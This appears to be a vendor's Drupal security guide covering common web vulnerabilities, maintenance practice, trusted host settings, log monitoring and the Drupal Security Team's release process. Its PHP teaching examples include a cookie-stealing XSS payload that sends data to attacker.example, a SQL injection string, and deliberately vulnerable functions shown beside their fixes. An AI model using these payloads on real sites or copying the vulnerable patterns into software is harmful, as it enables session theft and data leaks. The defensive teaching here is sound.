Most websites only need to worry about automated attacks: scanners and bots that probe every reachable site for known, unpatched vulnerabilities. These kinds of attacks have a low success rate against any one site, but they run constantly, so they still get in. High-risk websites also have to worry about a person actively trying to break into the site, usually for one of a few reasons:
- The website holds information worth stealing (e.g. an ecommerce site with membership records)
- The website has a lot of visitors
- Someone wants to shut the website down
What is Security?
- Confidentiality: In information security, confidentiality is the property that information is not made available or disclosed to unauthorized individuals, entities or processes.
- Integrity: Data integrity means maintaining and assuring the accuracy and completeness of data over its entire life cycle, so that data cannot be modified in an unauthorized or undetected manner. This is not the same thing as referential integrity in databases, although it can be viewed as a special case of consistency as understood in the classic ACID model of transaction processing. Information security systems typically provide message integrity in addition to data confidentiality.
- Availability: For any information system to serve its purpose, the information must be available when it is needed. The computing systems that store and process the information, the security controls that protect it, and the communication channels used to reach it must all be functioning correctly. High-availability systems aim to stay up at all times, avoiding disruptions from power outages, hardware failures and system upgrades. Ensuring availability also means withstanding denial-of-service attacks, such as a flood of incoming requests that forces the target system to stop serving legitimate users.
Common Website Security Issues
- Cross-Site Scripting
- Injection Flaws
- Malicious File Execution
- Insecure Direct Object Reference
- Cross-Site Request Forgery
- Information Leakage
- Insecure Cryptographic Storage
- Insecure Communications
- Failure to Restrict URL Access
- Unvalidated Input
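Two of the issues in the list above, Cross-Site Scripting and Injection Flaws, shown as a vulnerable snippet next to its hardened form. This is an added example, not code from the original article or from Drupal; it uses plain PHP with an in-memory SQLite database so it runs on its own, and the attacker strings are constructed. Drupal wraps the same two fixes in its own API: check_plain() in Drupal 7 and Html::escape() in Drupal 8 for HTML output, and query placeholders such as db_query('... WHERE name = :name', [':name' => $name]) instead of string-built SQL.

```php
<?php
// Added example, not from the original article or from Drupal.
// Shows XSS and SQL injection, each as a vulnerable function beside a hardened one.
declare(strict_types=1);

// Constructed attacker input.
$xssInput  = '<script>document.location="https://attacker.example/?c="+document.cookie</script>';
$sqliInput = "' OR '1'='1";

// --- Cross-Site Scripting -------------------------------------------------

// Vulnerable: user input is concatenated straight into HTML, so the <script>
// tag is delivered to every visitor's browser as markup.
function render_greeting_vulnerable(string $name): string {
    return "<p>Hello, $name</p>";
}

// Hardened: escape for the HTML context before output; the browser now shows
// the tag as text instead of running it.
function render_greeting_safe(string $name): string {
    $escaped = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p>Hello, $escaped</p>";
}

// --- Injection Flaws (SQL) ------------------------------------------------

// Constructed users table, kept in memory so the script runs stand-alone.
function make_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE users (uid INTEGER PRIMARY KEY, name TEXT, mail TEXT)');
    $db->exec("INSERT INTO users (name, mail) VALUES ('alice', 'alice@example.com'), ('bob', 'bob@example.com')");
    return $db;
}

// Vulnerable: string-built query. The quote in $sqliInput closes the literal
// and the rest becomes part of the WHERE clause, returning every row.
function find_user_vulnerable(PDO $db, string $name): array {
    $sql = "SELECT name, mail FROM users WHERE name = '$name'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: bound parameter. The input is always treated as a value, never as SQL.
function find_user_safe(PDO $db, string $name): array {
    $stmt = $db->prepare('SELECT name, mail FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = make_db();

echo "XSS, vulnerable: " . render_greeting_vulnerable($xssInput) . "\n";
echo "XSS, hardened:   " . render_greeting_safe($xssInput) . "\n\n";

echo "SQLi, vulnerable: " . count(find_user_vulnerable($db, $sqliInput)) . " row(s) returned (every user leaked)\n";
echo "SQLi, hardened:   " . count(find_user_safe($db, $sqliInput)) . " row(s) returned\n";
```

Run it with `php` on the command line: the vulnerable SQL lookup returns both users for the injected string while the prepared statement returns none, and the hardened greeting prints the `<script>` text as harmless `&lt;script&gt;`.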
How to Maintain Drupal Security
- Run the latest version of Drupal: Drupal updates contain new features, bug fixes and security fixes. Staying current protects your site against the common, easy-to-exploit vulnerabilities that automated attacks look for first. Note that Drupal 6 is no longer supported, so a Drupal 6 site no longer receives security fixes at all.
- Run the latest version of modules: Modules you've installed on your site can contain vulnerabilities that will increase the chance of your site being hacked. Make sure your modules are up-to-date.
- Be selective in choosing your modules: The majority of security advisories in Drupal are associated with contributed modules. If you have a website that contains sensitive data, be wary of the security of contributed modules.
- Remove inactive users: Users, especially administrators and others who can modify content, often choose weak passwords, and a dormant account is one nobody is watching. To limit what a compromised account can do, remove inactive users or reduce their roles.
- Use Drupal's Status Report: The Status Report page (admin/reports/status) gives you visibility into the important security controls your site should be using and warns you when one is missing. For example, it flags a site whose Trusted Host Settings are not configured, which leaves it open to a host header attack.
- Configure Trusted Host Settings: By default Drupal works out the site's base URL from the incoming request, and the HTTP Host header it relies on can be forged by an attacker, so absolute links that Drupal generates (including the links in password reset emails) can be made to point at a host the attacker controls. Setting trusted_host_patterns in settings.php restricts which host names Drupal will accept.
- Keep an eye on your logs: Drupal has a built-in log viewer (Recent log messages, at admin/reports/dblog, provided by the Database Logging module). By watching the logs you can reduce the impact of a breach by catching early warning signs such as repeated failed login attempts.
- Enable HTTPS: HTTPS should be used whenever a user passes sensitive information to the web server and vice versa, not only when your site has a shopping cart or Internet banking. In practice, serve the whole site over HTTPS: a session cookie sent over plain HTTP can be read and replayed by anyone on the path.
- Have a testing environment set up and ready to evaluate updates before deployment. Drupal security releases typically come out on Wednesdays.
- If you modify any Drupal core components, keep a vendor branch management strategy so you can track all your changes and still upgrade.
- Have code reviews, especially for custom modules and themes, which the Drupal Security Team does not cover.
- If you have very sensitive documents, store them separately from other resources. An attacker who compromises one site can use it to reach other sites on the same server, so isolate your projects by site and by sensitivity level.
- Work with Drupal's Security Team to keep your project secure. Subscribe to Drupal's security notification lists to stay updated on what the team is working on, what the latest issues are, and how to keep your site secure.
- If your team is new to Drupal, work with a vendor. Interested in our security or migration services? Sanmita provides a broad spectrum of web design services, from consulting to production and maintenance of websites and web applications. Contact us today to learn more about how we can help secure or upgrade your website.
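The Trusted Host Settings item above, worked through as an added example (not code from the original article or from Drupal). In Drupal 8 and later the setting is `$settings['trusted_host_patterns']` in `sites/default/settings.php`; Drupal passes those patterns to the underlying framework, which matches each one against the Host header as a regular expression. The `host_is_trusted()` function below is a simplified stand-in for that framework check, written here for illustration, and `www.example.com` / `example.com` are assumed site names.

```php
<?php
// Added example, not from the original article or from Drupal's own code.
declare(strict_types=1);

// Unconfigured: $settings['trusted_host_patterns'] is absent from settings.php.
// Drupal then accepts whatever Host header arrives and builds absolute URLs
// from it, which is what a host header attack abuses.
$settings_unconfigured = [];

// Configured: each entry is a regular expression matched against the Host
// header. Anchor with ^ and $ so that "www.example.com.attacker.example" does
// not match. The site names are assumptions for this example.
$settings = [];
$settings['trusted_host_patterns'] = [
    '^www\.example\.com$',
    '^example\.com$',
];

/**
 * Simplified stand-in for the framework's check (assumption: the real logic
 * lives in the HTTP foundation library Drupal uses, not here). With no
 * patterns configured every host is accepted, which is the weakness; with
 * patterns, the host must match one of them, case-insensitively.
 */
function host_is_trusted(string $host, array $patterns): bool {
    if ($patterns === []) {
        return true;
    }
    foreach ($patterns as $pattern) {
        if (preg_match('{' . $pattern . '}i', $host) === 1) {
            return true;
        }
    }
    return false;
}

// Constructed Host header values: the real site, and two forged headers.
$hosts = [
    'www.example.com',
    'EXAMPLE.com',
    'attacker.example',
    'www.example.com.attacker.example',
];

printf("%-34s %-14s %s\n", 'Host header', 'unconfigured', 'configured');
foreach ($hosts as $host) {
    printf("%-34s %-14s %s\n",
        $host,
        host_is_trusted($host, $settings_unconfigured['trusted_host_patterns'] ?? []) ? 'accepted' : 'rejected',
        host_is_trusted($host, $settings['trusted_host_patterns']) ? 'accepted' : 'rejected'
    );
}
```

The table it prints shows every host accepted in the unconfigured case and only the two anchored names accepted once the patterns are set. Remember to include every name the site is legitimately reached by (a staging host name, `localhost` for command-line tools, or a wildcard such as `'^.+\.example\.com$'` for subdomains), or those requests will be rejected too.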
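The "keep an eye on your logs" item above, turned into a concrete check as an added example (not code from the original article or from Drupal). Drupal's Database Logging module stores entries in the `watchdog` table with, among other columns, `type`, `message`, `variables`, `hostname` and `timestamp`; Drupal 8 logs a failed login as "Login attempt failed from %ip." and Drupal 7 as "Login attempt failed for %user.", with the client IP in `hostname` in both cases. The rows below are constructed to that shape so the script runs offline; on a live site you would select them from that table instead. The threshold and window are assumptions.

```php
<?php
// Added example, not from the original article or from Drupal's own code.
declare(strict_types=1);

// Build a constructed watchdog-style row for a failed login from $ip.
function failed_row(string $ip, int $ts): array {
    return [
        'type'      => 'user',
        'message'   => 'Login attempt failed from %ip.',
        'variables' => serialize(['%ip' => $ip]),
        'hostname'  => $ip,
        'timestamp' => $ts,
    ];
}

$base = 1700000000;
// Constructed sample rows (documentation IP ranges, not real clients).
$rows = [
    // A burst of failures from one client inside half a minute.
    failed_row('203.0.113.7', $base),
    failed_row('203.0.113.7', $base + 3),
    failed_row('203.0.113.7', $base + 9),
    failed_row('203.0.113.7', $base + 14),
    failed_row('203.0.113.7', $base + 20),
    failed_row('203.0.113.7', $base + 31),
    // A user mistyping a password a few times over an afternoon: not flagged.
    failed_row('198.51.100.23', $base),
    failed_row('198.51.100.23', $base + 2700),
    failed_row('198.51.100.23', $base + 6100),
    // Unrelated entries that the scan must ignore.
    ['type' => 'user', 'message' => 'Session opened for %name.',
     'variables' => serialize(['%name' => 'alice']), 'hostname' => '198.51.100.23', 'timestamp' => $base + 6200],
    ['type' => 'page not found', 'message' => '@uri',
     'variables' => serialize(['@uri' => '/wp-login.php']), 'hostname' => '203.0.113.7', 'timestamp' => $base + 40],
];

/**
 * Return, per client hostname, the largest number of failed logins seen inside
 * any window of $window seconds, for hosts that reach $threshold. A sliding
 * window over the sorted timestamps means a slow trickle spread over hours is
 * not flagged while a burst is. Matching on the message prefix covers both
 * the Drupal 7 and Drupal 8 wording.
 */
function flag_failed_logins(array $rows, int $threshold = 5, int $window = 300): array {
    $byHost = [];
    foreach ($rows as $row) {
        if ($row['type'] !== 'user' || strpos($row['message'], 'Login attempt failed') !== 0) {
            continue;
        }
        $byHost[$row['hostname']][] = (int) $row['timestamp'];
    }

    $flagged = [];
    foreach ($byHost as $host => $times) {
        sort($times);
        $start = 0;
        $n = count($times);
        for ($end = 0; $end < $n; $end++) {
            while ($times[$end] - $times[$start] > $window) {
                $start++;
            }
            $count = $end - $start + 1;
            if ($count >= $threshold) {
                $flagged[$host] = max($flagged[$host] ?? 0, $count);
            }
        }
    }
    return $flagged;
}

foreach (flag_failed_logins($rows) as $host => $count) {
    echo "ALERT: $host had $count failed logins within 5 minutes\n";
}
```

On the sample rows only 203.0.113.7 is reported (6 failures in 31 seconds). Drupal also has its own flood control that temporarily blocks logins after repeated failures, but that only slows the attacker down; a scan like this is what tells you the attempt is happening.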
The Drupal Security Team
The Security Release Process
- Vulnerability in code discovered - Anyone can identify and report a security issue to the team. To report an issue, read and follow the Drupal guide on how to report a security issue.
- Issue reported privately to Security team - Security issues are handled confidentially unless a vulnerability requires advanced permissions or access to exploit. In this case, the team encourages maintainers to fix these issues publicly because they don't represent a true threat on their own.
- Issue reviewed, potential impact on all supported Drupal releases evaluated - Two major release series are supported at any given time; currently these are Drupal 7.x and 8.x. Drupal 6 is no longer supported. You should always update to the most current version of the series you are using. We'll come back to this later.
- If the threat is valid, Security Team mobilized for analysis. Maintainer notified
- Security team provides support. Maintainer fixes the issue - Maintainers, testers and other interested parties collaborate to find a solution on a private, secure issue tracker.
- Fixes reviewed and discussed - Steps 1 through 4 continue until the Security Team and module maintainer are satisfied with the security issue.
- Code patches created and tested - the team tests the new code to make sure it doesn't introduce any new security issues
- New, fixed versions made available on Drupal.org
- Security advisory written and published via website, newsletter, RSS feeds for core and contributed modules, Twitter, etc.
- New versions deployed on all sites - The "Available updates" report on your Drupal site (admin/reports/updates, provided by the Update Manager module) tells you whether your Drupal core and contributed module versions are up to date, and gives download links and release notes for any new versions. These updates are not applied automatically, so check and update regularly to keep your site as secure as possible.